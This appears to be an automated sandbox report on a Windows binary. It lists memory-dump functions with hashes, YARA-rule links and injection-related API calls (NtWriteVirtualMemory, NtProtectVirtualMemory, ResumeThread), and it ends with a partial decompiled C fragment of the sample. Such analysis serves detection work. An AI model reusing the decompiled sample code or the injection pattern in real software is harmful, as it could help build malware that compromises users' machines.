                          • Opcode ID: 75140aaa6b0aaa3a8e99ab5c95853340ef05739d3eeda00674af5c54bcf9fa78
                          • Instruction ID: 0ca081bcadcb907f92dd78911a4f752f076383b79774a671cad4f7296ae3b344
                          • Opcode Fuzzy Hash: 75140aaa6b0aaa3a8e99ab5c95853340ef05739d3eeda00674af5c54bcf9fa78
                          • Instruction Fuzzy Hash: FED15CD5A2E703C5E493657140C547154A4EEA735A5738BBB6B33728C2A33E938B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403A59, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 466memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 81d723dee46c8a333d7a4c1eeee27e9c1f0367bf5a236c6878a5f93cbe02ed79
                          • Instruction ID: c3397bc43d08b1c1228f7726ccd88f792ac617b51ee6aafecb7cebe38466101a
                          • Opcode Fuzzy Hash: 81d723dee46c8a333d7a4c1eeee27e9c1f0367bf5a236c6878a5f93cbe02ed79
                          • Instruction Fuzzy Hash: 94E14CD5A2E703C5E493657140C547158A4EEA735A5738BBB6B33728C2A33E534B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403B49, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 462memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 97c9562cdbac4147a52a8023e3b75503e3b44e7eaa7e0d78d92bac5695e9ce88
                          • Instruction ID: 3f12c97372ce28f349635d59b4d4a7aced63875873a55da9ed396069577c3eb1
                          • Opcode Fuzzy Hash: 97c9562cdbac4147a52a8023e3b75503e3b44e7eaa7e0d78d92bac5695e9ce88
                          • Instruction Fuzzy Hash: 03D15DD5A2E703C5E493657140C547154A4EEA735A5738BBB6B33728C2A33E938B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403B13, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 459memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 438b530d07525076249d5500dd81a0f808f93beafd43bd280e7b4bceb66b84a4
                          • Instruction ID: 99dd2135415cf157fae98f5a96e407e5968a581688a5a073e6e10730b26765dc
                          • Opcode Fuzzy Hash: 438b530d07525076249d5500dd81a0f808f93beafd43bd280e7b4bceb66b84a4
                          • Instruction Fuzzy Hash: CCD16DD5A2E703C5E493657140C547154A4EEA735A5738BBB6B33728C2A33E938B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403A87, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 454memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 6bef497d9b5f4b97172db34dc01701245adf4153d42af17ecfef21b952a20b5a
                          • Instruction ID: 0c9976a05d9dd4049be2f25205429234c8763ff8644fe4b66d3c31dd3cf41106
                          • Opcode Fuzzy Hash: 6bef497d9b5f4b97172db34dc01701245adf4153d42af17ecfef21b952a20b5a
                          • Instruction Fuzzy Hash: 92E15CD5A2E703C6E49365B140C543154A4EEA735A5738BBB6B33728C2A33E534B728F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403C2E, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 423memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 52bfa5a8b7e36eeec5deebe43f23a49de523933cb62accdb20ce2fdcbec48f5c
                          • Instruction ID: ec6385e80530e1c63d068ebd7a092bb9023b5f6bf5db92ffd4e523cacb32beec
                          • Opcode Fuzzy Hash: 52bfa5a8b7e36eeec5deebe43f23a49de523933cb62accdb20ce2fdcbec48f5c
                          • Instruction Fuzzy Hash: 10D16ED5A2E703C5E49365B140C547154A4EEE735A5738BBB6B23728C2A33E834B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0F7D, Relevance: 1.8, APIs: 1, Instructions: 335COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 800b3f75948befbf3efb4c197ddbe2c41fa011944ae51ecf0feb7c8441892d21
                          • Instruction ID: 16f47fc57674b36db98aecf0ddfe82f4fd1a78549be71cf95a61a169821b30a2
                          • Opcode Fuzzy Hash: 800b3f75948befbf3efb4c197ddbe2c41fa011944ae51ecf0feb7c8441892d21
                          • Instruction Fuzzy Hash: 18B1F2B03C0305FFEF205E20CD95BEA3763EF45784F958128EE949B185D3B998898B45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D232A, Relevance: 1.8, APIs: 1, Instructions: 302nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadMemoryVirtualWrite
                          • String ID:
                          • API String ID: 3569954152-0
                          • Opcode ID: c7b9860b2ca21dd3f5506567b68fa810542c40d54807522489c0a70eb37e1756
                          • Instruction ID: 00bb0bcf8c6959294bcc5101538c77b7ce750a99675ce62e8abe992a8b0afd5d
                          • Opcode Fuzzy Hash: c7b9860b2ca21dd3f5506567b68fa810542c40d54807522489c0a70eb37e1756
                          • Instruction Fuzzy Hash: 9FA1F1B0380305FFEF205E24CD95BEA37A3EF45784F958128ED949B1C5C7B9A8868B45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D5435, Relevance: 1.8, APIs: 1, Instructions: 292COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b13b7fe4f2800007817ae4283d17bc8aaad6a6fc37901866109567dcad5b89d
                          • Instruction ID: 224165eb4ef06fb9d2719ba63d8f28c0d7d2e8602ffa54506280f515abbcc324
                          • Opcode Fuzzy Hash: 5b13b7fe4f2800007817ae4283d17bc8aaad6a6fc37901866109567dcad5b89d
                          • Instruction Fuzzy Hash: C99125B03C0306FFEF205E20CD91BEA36A3EF45384F958128EDA59B1C5D3B9A4858B45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D23D5, Relevance: 1.7, APIs: 1, Instructions: 240nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadMemoryVirtualWrite
                          • String ID:
                          • API String ID: 3569954152-0
                          • Opcode ID: d54f339f9087c76ba3b9803710847bd03c3ff50a480e7db7564bf4283a83c6ad
                          • Instruction ID: 74ad4e50101d879be90438629b21f2547dcc88f2cc1aa3db6cc4f3773e6f8473
                          • Opcode Fuzzy Hash: d54f339f9087c76ba3b9803710847bd03c3ff50a480e7db7564bf4283a83c6ad
                          • Instruction Fuzzy Hash: 888103B03C0306FFEB205E24CD95BEA36A3EF55344F958128ED959B2C5D7B9A8858B40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D2455, Relevance: 1.7, APIs: 1, Instructions: 211nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          • Opcode ID: a0effeb6b12b8d73c1df3db14bb383a32a7b85c17417f95c248ffe9f558a6559
                          • Instruction ID: 61b7bad085a08d543b98023ca9610a34c66c6d6d81da6986715c4bccb3795722
                          • Opcode Fuzzy Hash: a0effeb6b12b8d73c1df3db14bb383a32a7b85c17417f95c248ffe9f558a6559
                          • Instruction Fuzzy Hash: F671F3B03C0309FFFB215E14CD95BE936A2EF05344F958128ED959B1C5C7B9A8C98B41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D24BD, Relevance: 1.7, APIs: 1, Instructions: 190nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          • Opcode ID: e92ad1ce50f4631569b3add81fed85fc6b0b0604852b53f66895233a0847dedb
                          • Instruction ID: 5ed8fe7685c8239233b85250cea5112aaa62b0812a2bf33d743b6fee17b76047
                          • Opcode Fuzzy Hash: e92ad1ce50f4631569b3add81fed85fc6b0b0604852b53f66895233a0847dedb
                          • Instruction Fuzzy Hash: 9A61CDB03C0309FFFB215E10CD95BE936A2EF14344F948128FDA59A2C5C7B9A8D98B41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D2531, Relevance: 1.7, APIs: 1, Instructions: 169nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          • Opcode ID: c5cd357952217f11fccc880cdc6c7caf361d92fe4eedac8663cb1e394a2df912
                          • Instruction ID: 1a57643ed71ffa4e40d207ea76b6bfb00e4f87068d190b0a810953da90ae6760
                          • Opcode Fuzzy Hash: c5cd357952217f11fccc880cdc6c7caf361d92fe4eedac8663cb1e394a2df912
                          • Instruction Fuzzy Hash: 3751CE703C0309FEFF255E10CD91BE936A3EF15784F948128FEA59A1D5C7B9A8C99A40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D5F9F, Relevance: 1.7, APIs: 1, Instructions: 162nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                          • Instruction ID: 04b81233d35a02e3550603a5f227b749db0ba696b37cead405ebb7bc3a8246e8
                          • Opcode Fuzzy Hash: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                          • Instruction Fuzzy Hash: 234189316C0386DFEB295D34E9947E6675BEF52320FD6523ACCB287495E33484C5C601
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D6039, Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                          • Instruction ID: 075b35060b4e3e9139a8e062c13f335aaad4efe0744d00ce6618316cca6d6c5e
                          • Opcode Fuzzy Hash: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                          • Instruction Fuzzy Hash: A04196356C4386DFEB295E34E9A43E66B5BAF52320FDA5229C9B287895E33480C5C701
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D5FC1, Relevance: 1.6, APIs: 1, Instructions: 138nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                          • Instruction ID: 8332323a0dcece3460efde41534ba905eef697dc8f075d0330bda5690962a18f
                          • Opcode Fuzzy Hash: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                          • Instruction Fuzzy Hash: D14199346C0386DFEB295D34E9A07F6775BAF52324FDA5129CC7287895E33480C5C601
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D5FE5, Relevance: 1.6, APIs: 1, Instructions: 133nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: d43752ed222de2f07a970f03f62b49e04636d42826f0873387e8b061e4c0ea28
                          • Instruction ID: 6f6abf0ee7e2b3e2e9b535cb19dba2850e7851322ddf0162149dfebf94f199e5
                          • Opcode Fuzzy Hash: d43752ed222de2f07a970f03f62b49e04636d42826f0873387e8b061e4c0ea28
                          • Instruction Fuzzy Hash: 3C4197346C0386DFEB281D34E9A03E6679BAF52320FDA5529C872878A5E33880C5C701
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D6015, Relevance: 1.6, APIs: 1, Instructions: 126nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: da1907745b5f16c4153e732f3ab223196740eccdc58baa17209fcf62c5369363
                          • Instruction ID: 3c6bd0e8fc42aa8b4eb772d4fd046f371cfefb9c8f7256105baf4d80e96ae54e
                          • Opcode Fuzzy Hash: da1907745b5f16c4153e732f3ab223196740eccdc58baa17209fcf62c5369363
                          • Instruction Fuzzy Hash: 463197356C0386DFEB281E34E9A47E6379BAF52324FCA5529CC76878A5D33490C5CB01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D260D, Relevance: 1.6, APIs: 1, Instructions: 121nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          • Opcode ID: 249470a49a8d98ff69c7caabcab2f5e5722da3fa4f9f724e30d5171d5fc8b0dc
                          • Instruction ID: d0a591d1c0d00fff8c597c25b87ef586855e4b2e7ccb0973bc2363c60d48588a
                          • Opcode Fuzzy Hash: 249470a49a8d98ff69c7caabcab2f5e5722da3fa4f9f724e30d5171d5fc8b0dc
                          • Instruction Fuzzy Hash: E0419E707C0209FEFF255E20CD91BE936A3EF15384F988128FEA59A1D5C7B958D98B40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D6089, Relevance: 1.6, APIs: 1, Instructions: 115nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: cbe42170eda2a0b31139f48023a8f778f09492e3f8f65b2cdd921b6a5eb05a79
                          • Instruction ID: 0b586a312899c76fdf8b232566adb3b091aa0677f67980a10f149c94c23306cf
                          • Opcode Fuzzy Hash: cbe42170eda2a0b31139f48023a8f778f09492e3f8f65b2cdd921b6a5eb05a79
                          • Instruction Fuzzy Hash: 2F3179356C0286DFEF281E34E8543E6776BAF52324FCA5529C876C7961D33490C5CB01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D60D1, Relevance: 1.6, APIs: 1, Instructions: 109nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: c93ce533108b93e81efe02108c1f0c7fa303f673b485247b83a5cfd542ac9bb5
                          • Instruction ID: f94c13f3d2956b197a94e1aa8dc80ced735d05803078a86149acd2d038e08696
                          • Opcode Fuzzy Hash: c93ce533108b93e81efe02108c1f0c7fa303f673b485247b83a5cfd542ac9bb5
                          • Instruction Fuzzy Hash: 28315435AC0286DFEF285E34E8543E67B6AAF52320FCA5529C8B68B566D334D0C5CB01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D6106, Relevance: 1.6, APIs: 1, Instructions: 103nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 5cf53c7d16e79977f75a20c76f60ca71b611e1c225de6ef4e8165a3e437b22dd
                          • Instruction ID: e5cef4062156375e491d3ef8f59b4168b301e6b21f4b9ec9a83460173d346db9
                          • Opcode Fuzzy Hash: 5cf53c7d16e79977f75a20c76f60ca71b611e1c225de6ef4e8165a3e437b22dd
                          • Instruction Fuzzy Hash: B7316935AC0286DFEF285E34E8543E67B5BAF52320FCA5129C87687461D334D0C9C701
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D61ED, Relevance: 1.6, APIs: 1, Instructions: 79nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 7d2cc9a9980ce75b53456217ff6a9159e5023449964feed892f952dc84ba6c43
                          • Instruction ID: 738073b2c5bea3655199eddf3d9a73a11b1d563a3559ce98c04597e10ca22b47
                          • Opcode Fuzzy Hash: 7d2cc9a9980ce75b53456217ff6a9159e5023449964feed892f952dc84ba6c43
                          • Instruction Fuzzy Hash: B5215B34680296EFEB241E34D8687E77BAAAF12324FC95559C8BACB5B4D334D0D4CB41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D2705, Relevance: 1.6, APIs: 1, Instructions: 70nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          • Opcode ID: f8d65670152e9525930e894010c9818f94664eaa2e997f2c3486d60d0d648629
                          • Instruction ID: 1affed8d5c6745db0fa7a13bd3649064552be40820042d3745833f7f59859ed0
                          • Opcode Fuzzy Hash: f8d65670152e9525930e894010c9818f94664eaa2e997f2c3486d60d0d648629
                          • Instruction Fuzzy Hash: 49218C71B80209EFEF256E24CE90BD936A3FF55380FD88224FDA596194CB3958958B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D6239, Relevance: 1.6, APIs: 1, Instructions: 65nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: fbafeb0e1a69d98279b6a8d12122e00519fee77eb97c5721d693cefb396c3f6e
                          • Instruction ID: a2f302bdcbc348a02585924c0e8dca867b212473194065f56f47867ecee9d479
                          • Opcode Fuzzy Hash: fbafeb0e1a69d98279b6a8d12122e00519fee77eb97c5721d693cefb396c3f6e
                          • Instruction Fuzzy Hash: 21112738A80289EFEB255E34E8683D2BBAAAF12324FC95155C8B98B475D330D0D4C741
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D276A, Relevance: 1.5, APIs: 1, Instructions: 49nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          • Opcode ID: c5afe4dfa15c1be37158547814ac5a51bfc282234dd294ef3d741ce5f93046d2
                          • Instruction ID: 86bcdabc38315b17a615572762e8bee0d7ebeb8eec93700adf375ee02d64cc97
                          • Opcode Fuzzy Hash: c5afe4dfa15c1be37158547814ac5a51bfc282234dd294ef3d741ce5f93046d2
                          • Instruction Fuzzy Hash: 7D11697078020AFFEF156E20CE90BD87AB3FF15384F885224EE98950A4CB7658E59B40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D62C5, Relevance: 1.5, APIs: 1, Instructions: 37nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                          • Instruction ID: 22a2a966f7c2707fa1e2e02cbb775198114843ade7ea44727070181cc235b094
                          • Opcode Fuzzy Hash: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                          • Instruction Fuzzy Hash: B5F0A726BC0297DA67296A38D5643E32B2B9C732247CC4545CCA5CB968F721D0D5C305
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D5A6C, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021D5609,00000040,021D0570,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 021D5A87
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                          • Instruction ID: 25e40e74b59276d6f5ce34737175f32982b68450b30fcba362293b3e3ffdab88
                          • Opcode Fuzzy Hash: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                          • Instruction Fuzzy Hash: 11C012E06140006E65048D28CD48D2772AA86D5628B14C31CB831222CCC530DC044131
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D6325, Relevance: 1.5, APIs: 1, Instructions: 14nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                          • Instruction ID: 684865884c2959b93db608ca1b9bb9e5f2eab58b8f0cc8833163df71ff245eaa
                          • Opcode Fuzzy Hash: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                          • Instruction Fuzzy Hash: 54D012245903458D7F196D71C6E438B3A2A5C95004798891CD892D2508EB32C0498514
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040BE20, Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 156COMMON
                          Download Yara Rule
                          C-Code - Quality: 62%
                          			E0040BE20(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				char _v48;
				char _v52;
				char _v60;
				signed int _v64;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _t89;
				signed int _t95;
				signed int _t112;
				signed int _t115;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t130 = _t129 - 0xc;
				 *[fs:0x0] = _t130;
				L00401120();
				_v16 = _t130;
				_v12 = 0x4010d0;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0x000000fe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401126, _t127);
				_t89 =  *((intOrPtr*)( *_a4 + 0x14c))(_a4, 0);
				asm("fclex");
				_v64 = _t89;
				if(_v64 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x14c);
					_push(0x4020d4);
					_push(_a4);
					_push(_v64);
					L004011F2();
					_v76 = _t89;
				}
				L004011DA();
				L004011DA();
				_t95 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v36, 0x60c952,  &_v40,  &_v48);
				_v64 = _t95;
				if(_v64 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x402104);
					_push(_a4);
					_push(_v64);
					L004011F2();
					_v80 = _t95;
				}
				_v32 = _v48;
				L004011D4();
				L004011DA();
				_v60 =  *0x4010c8;
